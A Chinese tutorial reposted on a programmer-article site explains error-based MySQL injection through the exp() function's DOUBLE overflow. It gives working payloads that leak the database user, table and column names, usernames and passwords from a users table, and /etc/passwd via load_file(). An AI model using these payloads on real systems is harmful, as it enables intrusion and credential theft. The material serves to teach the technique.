欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

SQL注入 | exp()函数报错

程序员文章站 2024-02-27 16:46:21
...

0x01原理
当传递一个大于709的值时,函数exp()就会引起一个溢出错误。

mysql> select exp(709);
+-----------------------+
| exp(709)              |
+-----------------------+
| 8.218407461554972e307 |
+-----------------------+
1 row in set (0.00 sec)

mysql> select exp(710);
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(710)'

MySQL中,exp与ln和log的功能相反,简单介绍下,就是log和ln都返回以e为底数的对数。

mysql> select log(15);
+------------------+
| log(15)          |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)
    
mysql> select ln(15);
+------------------+
| ln(15)           |
+------------------+
| 2.70805020110221 |
+------------------+
1 row in set (0.00 sec)

mysql> select exp(2.70805020110221);
+-----------------------+
| exp(2.70805020110221) |
+-----------------------+
|                    15 |
+-----------------------+
1 row in set (0.00 sec)

0x02注入
0按位取反就会返回“18446744073709551615”,再加上函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到最大的无符号BIGINT值。

mysql> select ~0;
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set (0.00 sec)

mysql> select ~(select version());
+----------------------+
| ~(select version())  |
+----------------------+
| 18446744073709551610 |
+----------------------+
1 row in set, 1 warning (0.00 sec)

通过子查询与按位求反,造成一个DOUBLE overflow error,并借由此注出数据。

  mysql> select exp(~(select*from(select user())x));  
  ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select '[email protected]' from dual)))' 

0x03 注出数据
得到表名:

select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x)); 

得到列名:

select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x)); 

检索数据:

select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x)); 

0x04 读取文件
通过load_file()函数来读取文件

select exp(~(select*from(select load_file('/etc/passwd'))a));  

归纳自:http://netsecurity.51cto.com/art/201508/489529.htm

相关标签: exp()